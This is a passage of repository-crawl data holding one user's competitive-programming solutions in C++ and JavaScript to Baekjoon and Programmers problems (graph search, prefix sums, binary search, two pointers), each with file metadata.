i++) cin >> arr[i];\n\n dfs(1);\n if(s == 0) ans--;\n \n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3451612889766693, "alphanum_fraction": 0.3774193525314331, "avg_line_length": 15.92727279663086, "blob_id": "9ecb17ea437ce400a0ebebe41826576d84ffe878", "content_id": "d7e34b37c03138ba1f1f2cc1c0125f1aa760ed35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 940, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/BOJ/BFS_DFS/11403.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 11403번: 경로 찾기\nDATE: 2021-02-22\nBFS\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint n;\nint arr[101][101];\n\nvoid bfs(int num){\n bool visited[n] = {false, };\n queue<int> q;\n\n q.push(num);\n\n while(!q.empty()){\n int cur = q.front();\n q.pop();\n\n for(int i = 0 ; i < n ; i++){\n if(arr[cur][i] && !visited[i]){\n q.push(i);\n visited[i] = true;\n arr[num][i] = 1;\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n;\n\n for(int i = 0 ; i < n ; i ++){\n for(int j = 0 ; j < n ; j++){\n cin >> arr[i][j]; \n }\n }\n\n for(int i = 0 ; i < n ; i++){\n bfs(i);\n }\n\n for(int i = 0 ; i < n ; i ++){\n for(int j = 0 ; j < n ; j++){\n cout << arr[i][j] << \" \"; \n }\n cout << \"\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.6489361524581909, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 30.33333396911621, "blob_id": "a07a257eb16f8cf1bc76efd2268b4761f99186f1", 
"content_id": "fe62c44c49a62509c9b785a1c43e0993d777d31a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "no_license", "max_line_length": 59, "num_lines": 3, "path": "/README.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# ALGORITHM \n### 백준, 프로그래머스 문제 풀이\n자세한 풀이는 (https://9x211x2.tistory.com/category/ALGORITHM) ✏✏\n" }, { "alpha_fraction": 0.4636678099632263, "alphanum_fraction": 0.49596309661865234, "avg_line_length": 16.360000610351562, "blob_id": "a4c81e91c2cb7936b18d3473997a30282e559029", "content_id": "ed8c47a214f84f7804f760347c65bd45f6933aa8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 877, "license_type": "no_license", "max_line_length": 52, "num_lines": 50, "path": "/programmers/Level 1/make_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 소수 만들기\n//2021-10-11\n#include <vector>\n#include <math.h>\n#include <iostream>\nusing namespace std;\n\nvector<int> v;\nint cArr[3];\nint answer = 0;\n\nbool isPrime(int num) {\n if(num < 2) return false;\n \n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n \n return true;\n}\n\nvoid combination(int depth, int next) {\n if(depth == 3) {\n int sum = 0;\n \n for(int i = 0 ; i < 3 ; i++) sum += cArr[i];\n if(isPrime(sum)) answer++;\n \n return;\n }\n \n for(int i = next ; i <= v.size() ; i++) {\n cArr[depth] = v[i - 1];\n combination(depth + 1, i + 1);\n }\n}\n\nint solution(vector<int> nums) {\n v = nums;\n combination(0, 1);\n \n return answer;\n}\n\nint main() {\n int answer = solution({1, 2, 3, 4});\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.3113890588283539, "alphanum_fraction": 0.3429888188838959, "avg_line_length": 20.11111068725586, "blob_id": "a37d3097c89ced02bcdacf58ec500c4f9ae26118", "content_id": "4be2ea597fb7c27ce424da89084241226e719749", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1621, "license_type": "no_license", "max_line_length": 71, "num_lines": 72, "path": "/BOJ/Implementation/20055.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 20055번: 컨베이어 벨트 위의 로봇\nDATE: 2021-10-21\n*/\n#include <iostream>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, k, in, out;\n int ans = 0;\n cin >> n >> k;\n\n in = 0; out = n - 1; // 올리는 위치, 내리는 위치\n vector<pair<int,int>> v(n + n); // 내구도, 로봇 존재 여부\n \n for(int i = 0 ; i < n + n ; i++) {\n cin >> v[i].first;\n v[i].second = 0;\n }\n\n while(1) {\n bool flag = true;\n int check = 0;\n ans++; // 단계\n\n // 한 칸씩 회전\n pair<int,int> tmp = v[n + n - 1];\n\n for(int i = n + n - 2 ; i >= 0 ; i--) v[i + 1] = v[i];\n v[0] = tmp;\n\n if(v[out].second) v[out].second = 0;\n\n // 로봇 이동\n for(int i = n - 2 ; i >= 0 ; i--) {\n if(!v[i + 1].second && v[i].second && v[i + 1].first > 0) {\n v[i].second = 0;\n v[i + 1].first -= 1;\n v[i + 1].second = 1;\n\n if(i + 1 == out) {\n v[i + 1].second = 0;\n }\n }\n }\n\n // 로봇 올리기\n if(v[in].first > 0) {\n v[in].first -= 1;\n v[in].second = 1;\n }\n\n // 내구도 확인\n for(int i = 0 ; i < n + n ; i++) {\n if(v[i].first == 0) {\n check++;\n if(check == k) {\n flag = false;\n break;\n }\n }\n }\n\n if(!flag) break;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3111254870891571, "alphanum_fraction": 0.3363518714904785, 
"avg_line_length": 23.95161247253418, "blob_id": "72dca78abe27b61b8961e1bcf0f636cf8a92294b", "content_id": "5ed24ecf020609305e76ce3ef65291812cb122ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 94, "num_lines": 62, "path": "/BOJ/Two Pointer/17609.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17609번: 회문\nDATE: 2022-03-18\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t;\n string orgStr, revStr;\n\n cin >> t;\n\n while(t--){\n cin >> revStr;\n\n orgStr = revStr;\n reverse(revStr.begin(), revStr.end());\n\n if(orgStr == revStr) cout << 0 << '\\n';\n else{\n int s = 0, e = orgStr.length() - 1;\n int cnt = 0;\n\n while(s < e){\n if(orgStr[s] == orgStr[e]){\n s++;\n e--;\n }\n else if(orgStr[s + 1] == orgStr[e] && orgStr[s] != orgStr[e - 1] && cnt == 0){\n cnt++;\n s++;\n }\n else if(orgStr[s] == orgStr[e - 1] && orgStr[s + 1] != orgStr[e] && cnt == 0){\n cnt++;\n e--;\n }\n else{\n string A = orgStr, B = orgStr;\n A.erase(s, 1);\n B.erase(e, 1);\n \n string revA = A, revB = B;\n reverse(revA.begin(), revA.end());\n reverse(revB.begin(), revB.end());\n\n if(revA == A || revB == B) cout << 1 << '\\n';\n else cout << 2 << '\\n';\n\n cnt = 100000;\n break;\n }\n }\n\n if(cnt == 1) cout << 1 << '\\n';\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3979797959327698, "alphanum_fraction": 0.4484848380088806, "avg_line_length": 14.030303001403809, "blob_id": "14bafcf51503c339a6fc076b05ed6bf5186098dd", "content_id": "019510e9d42fb4c12322e272c4a7ab5ae92c4694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 507, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Implementation/14425.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 14425번: 문자열 집합\nDATE: 2021-02-15\n*/\n#include <iostream>\n#include <map>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, cnt=0;\n cin >> n >> m;\n\n map<string, int> m1;\n\n for(int i = 0 ; i < n ; i++){\n string str;\n cin >> str;\n\n m1[str] = 1;\n }\n\n for(int i = 0 ; i < m ; i++){\n string str;\n cin >> str;\n \n if(m1[str] == 1) cnt++;\n }\n\n cout << cnt;\n\n return 0;\n}" }, { "alpha_fraction": 0.40799999237060547, "alphanum_fraction": 0.4533333480358124, "avg_line_length": 18.256410598754883, "blob_id": "33d0f942f1c9c3653c6201c9917b79ecf5a046e0", "content_id": "07635befae89dbf78e7b37ceb95eb3dd7368825d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 790, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Bitmask/2961.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2961번: 도영이가 만든 맛있는 음식\nDATE: 2022-01-26\nBitmask\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, a, b;\n long long minimum = 10000000000;\n cin >> n;\n\n vector<pair<int,int>> vec(n);\n\n for(int i = 0 ; i < n ; i++) {\n cin >> vec[i].first >> vec[i].second;\n }\n\n for(int i = 1 ; i < (1 << n) ; i++) { // 부분 집합 전체 개수\n long long a = 1, b = 0;\n\n for(int j = 0 ; j < n ; j++){\n if(i & (1 << j)) {\n a *= vec[j].first; \n b += vec[j].second;\n 
}\n }\n\n minimum = min(minimum, abs(a - b));\n }\n\n cout << minimum;\n \n return 0;\n}" }, { "alpha_fraction": 0.42115384340286255, "alphanum_fraction": 0.4596153795719147, "avg_line_length": 16.366666793823242, "blob_id": "0e526f4b44c0dfd7ef928588e69fd94057a89830", "content_id": "25dd14f9023aff849914ba98c51d401585d8a3d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 532, "license_type": "no_license", "max_line_length": 60, "num_lines": 30, "path": "/BOJ/Implementation/11728.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11728번: 배열 합치기\n2021-12-28\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v;\n int a, b, n;\n cin >> a >> b;\n\n for(int i = 0 ; i < a ; i++) {\n cin >> n;\n v.push_back(n);\n }\n\n for(int i = 0 ; i < b ; i++) {\n cin >> n;\n v.push_back(n);\n }\n\n sort(v.begin(), v.end());\n for(int i = 0 ; i < v.size() ; i++) cout << v[i] << \" \";\n\n return 0;\n}" }, { "alpha_fraction": 0.4411085546016693, "alphanum_fraction": 0.48960739374160767, "avg_line_length": 12.151515007019043, "blob_id": "63b544087844ff73f4b25e744b2c3b37b03d8e98", "content_id": "b9e1c314b329c43f119045bc6300d9769e4b13fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 441, "license_type": "no_license", "max_line_length": 30, "num_lines": 33, "path": "/BOJ/Implementation/11279.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 11279¹ø: ÃÖ´ë Èü\nDATE: 2021-01-06\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0);\n\tcin.tie(0);\n\n\tint n, x;\n\tpriority_queue<int> pq;\n\n\tcin >> n;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> x;\n\t\tif (x != 0) {\n\t\t\tpq.push(x);\n\t\t}\n\t\telse if (x == 0) {\n\t\t\tif (pq.empty()) {\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tcout << pq.top() << \"\\n\";\n\t\t\tpq.pop();\n\t\t}\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.4329896867275238, "alphanum_fraction": 0.47766321897506714, "avg_line_length": 14.368420600891113, "blob_id": "e09ada9a1eb2b4efac11c21eeac24b1f4a6177c8", "content_id": "0496568ddd203dd959ea38c3027cd3cec1b926af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 295, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/programmers/Level 2/carpet.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 카펫\n2021-12-27\n*/\nfunction solution(brown, yellow) {\n let answer = [];\n let h = 3, w;\n\n while (1) {\n w = Math.floor((brown + yellow) / h);\n\n if ((h - 2) * (w - 2) == yellow) break;\n h++;\n }\n\n answer.push(w, h);\n\n return answer;\n}" }, { "alpha_fraction": 0.33853355050086975, "alphanum_fraction": 0.40873634815216064, "avg_line_length": 17.882352828979492, "blob_id": "34535d0335d4f12a7ef82ebe23677801b35acaf7", "content_id": "083748add1b612e24102102b880b8a2437e656a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 655, "license_type": "no_license", "max_line_length": 75, "num_lines": 34, "path": "/BOJ/Prefix Sum/11660.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11660번: 구간 합 구하기 5\nDATE: 2022-01-22\nPrefix Sum\n*/\n#include 
<iostream>\nusing namespace std;\n\nint arr[1025][1026];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, ans = 0;\n int x1, y1, x2, y2;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> arr[i][j];\n arr[i][j] += arr[i][j - 1];\n }\n }\n \n for(int i = 0 ; i < m ; i++){\n cin >> x1 >> y1 >> x2 >> y2;\n\n ans = 0;\n for(int i = x1 ; i <= x2 ; i++) ans += arr[i][y2] - arr[i][y1 - 1];\n\n cout << ans << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.37249594926834106, "alphanum_fraction": 0.4120194911956787, "avg_line_length": 21.265060424804688, "blob_id": "03a3178c1167ce6a646ef601248fb45f5cc82e8d", "content_id": "73f68633b4e522f3c4d704eb2b55188ee92c9a1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1847, "license_type": "no_license", "max_line_length": 119, "num_lines": 83, "path": "/programmers/Level 2/kakao_friends_coloringbook.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2 : KAKAO friends coloring book\n//2017 KAKAO CODE\n//2021-05-26\n#include <vector>\n#include <algorithm>\n#include <iostream>\n#define MAX 101\nusing namespace std;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint cnt, area, r, c;\nint dx[] = { 0, 0, 1, -1 };\nint dy[] = { 1, -1, 0, 0 };\n\nvoid dfs(int x, int y){\n int n = arr[x][y];\n arr[x][y] = 0;\n cnt++;\n \n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n \n if(nx < 0 || ny < 0 || nx >= r || ny >= c || visited[nx][ny])\n continue;\n if(arr[nx][ny] == n){\n dfs(nx, ny);\n }\n }\n}\n\nvector<int> solution(int m, int n, vector<vector<int>> picture) {\n int number_of_area = 0;\n int max_size_of_one_area = 0;\n vector<int> answer(2);\n vector<int> v;\n \n cnt = area = 0;\n r = m;\n c = n;\n\n for(int i = 0 ; i < MAX ; i++){\n for(int j = 0 ; j < MAX ; j++){\n arr[i][j] = visited[i][j] = 0;\n \n }\n }\n \n for(int i = 0 ; i < m ; i++){\n for(int j = 0 ; j < n ; j++){\n arr[i][j] = picture[i][j];\n }\n } \n \n for(int i = 0 ; i < m ; i++){\n for(int j = 0 ; j < n ; j++){\n if(arr[i][j] != 0){\n cnt = 0;\n dfs(i, j);\n area++;\n v.push_back(cnt);\n }\n }\n }\n \n sort(v.begin(), v.end());\n \n answer[0] = number_of_area = area;\n answer[1] = max_size_of_one_area = v[v.size() - 1];\n return answer;\n}\n\nint main(){\n vector<vector<int>> picture = {{1, 1, 1, 0}, {1, 1, 1, 0}, {0, 0, 0, 1}, {0, 0, 0, 1}, {0, 0, 0, 1}, {0, 0, 0, 1}};\n \n vector <int> answer = solution(6, 4, picture);\n\n for(int i = 0 ; i < answer.size() ; i++){\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3957446813583374, "alphanum_fraction": 0.42553192377090454, "avg_line_length": 15.821428298950195, "blob_id": "023d689f428c69498c444aee4793e0006a44a39b", "content_id": "e5a5050e623e12437b912f2a09030f50dad31fa6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 476, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/BOJ/Implementation/9012.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9012번: 괄호\nDATE: 2022-04-05\n*/\n#include <iostream>\n#include <stack>\nusing namespace std;\n\nint main(){\n int t;\n cin >> t;\n\n while(t--){\n stack<char> s;\n string str;\n cin >> str;\n\n for(int i = 0 ; i < str.length() ; i++) {\n if(s.empty() || str[i] == '(') s.push(str[i]);\n else if(s.top() == '(') s.pop();\n }\n\n if(!s.empty()) cout << 
\"NO\\n\";\n else cout << \"YES\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3884892165660858, "alphanum_fraction": 0.42446044087409973, "avg_line_length": 17.730770111083984, "blob_id": "b944a110de3f04da15d9ffbee15f930a5788df33", "content_id": "19f218b728d1a5342dc99fe8c86c53c0384e91d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1115, "license_type": "no_license", "max_line_length": 69, "num_lines": 52, "path": "/BOJ/Binary Search/2110.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2110번: 공유기 설치\nDATE: 2021-07-01\nUPDATE: 2021-11-29\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, c, start, end, mid, ans=-1;\n cin >> n >> c;\n\n int arr[n];\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n sort(arr, arr+n);\n\n start = 1;\n end = arr[n-1];\n\n while(end - start >= 0){\n int cnt=1, idx = 0; \n mid = (end + start) / 2; //공유기 사이의 거리가 최소 x 이상일 때, 가능한 최대의 x값\n\n for(int i = 1 ; i < n ; i++){\n if(arr[i] - arr[idx] >= mid) {\n idx = i; // 공유기 설치\n cnt++;\n }\n }\n\n //공유기의 개수가 c보다 작으면: 최소 거리의 최댓값 감소\n //크거나 같으면: 최소 거리의 최댓값 증가\n if(cnt < c){ \n end = mid - 1;\n }\n else if(cnt >= c){\n start = mid + 1;\n ans = max(ans, mid);\n }\n\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4766214191913605, "alphanum_fraction": 0.5037707686424255, "avg_line_length": 18.52941131591797, "blob_id": "6fa857b3c074db913bac26b4f0018dcb81c1c5f3", "content_id": "1013f0f02ca6664dd9ddd72d49c8784a11083083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 665, "license_type": "no_license", "max_line_length": 77, "num_lines": 34, "path": "/BOJ/Binary Search/1365.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1365번: 꼬인 전깃줄\n2022-01-08\nLongest Increasing Subsequence\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int n, num, cnt = 0;\n cin >> n;\n\n vector<int> vec;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n\n if(vec.empty()) vec.push_back(num);\n else {\n int back = vec.back();\n int idx = lower_bound(vec.begin(), vec.end(), num) - vec.begin();\n \n if(num > back) vec.push_back(num);\n else vec[idx] = num;\n }\n }\n\n cout << n - vec.size();\n\n return 0;\n}" }, { "alpha_fraction": 0.516883134841919, "alphanum_fraction": 0.5480519533157349, "avg_line_length": 15.083333015441895, "blob_id": "bf44278f241ffbedd79d060de8962000e8719777", "content_id": "23e4e411f51696848f41cd10b8dfd87a82115734", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 399, "license_type": "no_license", "max_line_length": 51, "num_lines": 24, "path": "/programmers/Level 2/remove_pair.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 짝지어 제거하기\ndate: 2022-06-01\n*/\n#include <iostream>\n#include <string>\n#include <stack>\nusing namespace std;\n\nint solution(string s)\n{\n int answer = -1;\n stack<char> st;\n \n for(auto i : s){\n if(st.empty() || st.top() != i) st.push(i);\n else st.pop();\n }\n \n if(st.empty()) answer = 1;\n else answer = 0;\n \n return answer;\n}" }, { "alpha_fraction": 0.41342756152153015, "alphanum_fraction": 0.4540635943412781, "avg_line_length": 16.18181800842285, "blob_id": 
"8138c51f6c6c57c7c01cf2b0d8efe24433b02d6e", "content_id": "ecaa2fbff03e1c44853a46993e763eaead2b4145", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 568, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Prefix Sum/10211.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10211번: Maximum Subarray\nDATE: 2022-01-23\nPrefix Sum\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc, n;\n \n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++){\n cin >> n;\n\n int arr[n];\n int maxVal = -1e9;\n int sum = 0;\n\n for(int j = 0 ; j < n ; j++) {\n cin >> arr[j];\n sum = max(0, sum) + arr[j];\n maxVal = max(maxVal, sum);\n }\n\n cout << maxVal << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4746543765068054, "alphanum_fraction": 0.5299538969993591, "avg_line_length": 20.799999237060547, "blob_id": "b963557c536d0b4ae22e33d9fe624c8790d55508", "content_id": "e70875d860a56455af122861cc018776376fedea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 225, "license_type": "no_license", "max_line_length": 74, "num_lines": 10, "path": "/programmers/Level 2/the_biggest_number.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 가장 큰 수\n2021-12-27\n*/\nfunction solution(numbers) {\n let answer = numbers.sort((a, b) => `${b}${a}` - `${a}${b}`).join('');\n answer = answer[0] === \"0\" ? \"0\" : answer;\n\n return answer;\n}" }, { "alpha_fraction": 0.3964562714099884, "alphanum_fraction": 0.42303434014320374, "avg_line_length": 16.056604385375977, "blob_id": "4e6f764296b6835814c49109b3208a1e22293861", "content_id": "a815cae47408c916e84ec4238be82e2e036128c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 909, "license_type": "no_license", "max_line_length": 59, "num_lines": 53, "path": "/BOJ/Two Pointer/1253.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1253번: 좋다\nDATE: 2022-01-18\nTwo pointer\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<int> vec;\n int n, input;\n int start, end;\n int ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> input;\n vec.push_back(input);\n }\n\n if(n <= 2) {\n cout << 0;\n return 0;\n }\n\n sort(vec.begin(), vec.end());\n\n for(int i = 0 ; i < n ; i++) { \n vector<int> cp = vec;\n cp.erase(cp.begin() + i);\n \n start = 0; end = n - 2;\n\n while(start < end) {\n int sum = cp[start] + cp[end];\n\n if(sum == vec[i]) {\n ans++;\n break;\n }\n\n if(sum < vec[i]) start++;\n else end--;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4269340932369232, "alphanum_fraction": 0.4985673427581787, "avg_line_length": 16.5, "blob_id": "83f2985a23bc26e8f58eee0ed7c4bb0057faf9e8", "content_id": "c75f7fe3e3a9d6267b2d68d682edc033875f7f93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 369, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/BOJ/Implementation/11721.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 11721번: 열 개씩 끊어 출력하기\n//2021-05-04\n#include <iostream>\nusing namespace std;\n\nint main(){\n 
ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n cin >> str;\n\n while(1){\n if(str.length() == 0)\n break;\n \n cout << str.substr(0, 10) << '\\n';\n str.erase(0, 10);\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4141252040863037, "alphanum_fraction": 0.43338683247566223, "avg_line_length": 18.793651580810547, "blob_id": "d290e3a8cb30727f0c4232db330006fa78762cc2", "content_id": "e26bef202e06a4d90bf2ebc82eb0b569deb2f24c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 65, "num_lines": 63, "path": "/BOJ/Binary Search/2143.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2143번: 두 배열의 합\nDATE: 2022-02-09\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int t, n, m, num;\n long long sum, ans = 0;\n\n vector<long long> a, b, aSum, bSum;\n\n cin >> t >> n;\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n a.push_back(num);\n }\n\n cin >> m;\n for(int i = 0 ; i < m ; i++) {\n cin >> num;\n b.push_back(num);\n }\n \n for(int i = 0 ; i < n ; i++){\n aSum.push_back(a[i]);\n sum = a[i];\n\n for(int j = i + 1 ; j < n ; j++){\n sum += a[j];\n aSum.push_back(sum);\n }\n }\n\n for(int i = 0 ; i < m ; i++){\n bSum.push_back(b[i]);\n sum = b[i];\n\n for(int j = i + 1 ; j < m ; j++){\n sum += b[j];\n bSum.push_back(sum);\n }\n }\n\n sort(bSum.begin(), bSum.end());\n\n for(int i = 0 ; i < aSum.size() ; i++) {\n int diff = t - aSum[i]; \n\n auto lower = lower_bound(bSum.begin(), bSum.end(), diff);\n auto upper = upper_bound(bSum.begin(), bSum.end(), diff);\n\n ans += upper - lower; //bSum에 존재하는 diff의 개수\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.41085270047187805, "alphanum_fraction": 0.4635658860206604, "avg_line_length": 13.333333015441895, "blob_id": "0eeab2843df378d4ab245900eeb287088a54a263", "content_id": "932b431475a28bdf9f74e99c2cb61577f063345c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 677, "license_type": "no_license", "max_line_length": 55, "num_lines": 45, "path": "/BOJ/Greedy/11501.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 11501번: 주식\nDATE: 2021-01-10\n*/\n#include <iostream>\nusing namespace std;\nint price[1000000] = { 0, };\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tint t, n, max;\n\tlong long ans;\n\n\tcin >> t;\n\tfor (int i = 0; i < t; i++) {\n\t\tcin >> n;\n\t\tfor (int j = 0; j < n; j++) {\n\t\t\tcin >> price[j];\n\t\t}\n\n\t\tans = 0;\n\t\tmax = price[n-1]; \n\n\t\tfor (int k = n-1 ; k >= 0 ; k--) {\n\t\t\tif (price[k] > max) { //가장 큰 주가\n\t\t\t\tmax = price[k];\n\t\t\t}\n\t\t\telse if (price[k] < max) { //이익 발생\n\t\t\t\tans += max - price[k];\n\t\t\t}\n\t\t}\n\n\t\tif (max == price[0]) { //최대 이익 0\n\t\t\tcout << 0 << \"\\n\";\n\t\t\tcontinue;\n\t\t}\n\n\t\tcout << ans << \"\\n\";\n\n\t}\n\n\treturn 0;\n\n}\n" }, { "alpha_fraction": 0.47686833143234253, "alphanum_fraction": 0.5088967680931091, "avg_line_length": 17.161291122436523, "blob_id": "7c889d80877a9a1939650d8f6100c422ab9d8a06", "content_id": "0ef42b8f7cd1374b874619244339315c96b80082", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 572, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/BOJ/Implementation/1181.cpp", 
